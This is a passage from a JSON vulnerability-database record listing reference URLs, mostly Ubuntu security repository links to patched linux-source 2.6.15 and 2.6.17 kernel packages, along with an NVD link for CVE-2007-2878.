        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2878"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-generic_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc-smp_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-k7_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-686_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server-bigiron_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64-smp_2.6.15-29.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-29.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-29.58_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-server_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-k7_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-686_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-k8_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-386_2.6.15-29.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-generic_2.6.15-29.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.58.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc64-smp_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc64-smp_2.6.15-29.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64-smp_2.6.15-29.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-sparc64-di_2.6.15-29.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-386-di_2.6.15-29.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc-di_2.6.15-29.58_powerpc.udeb"
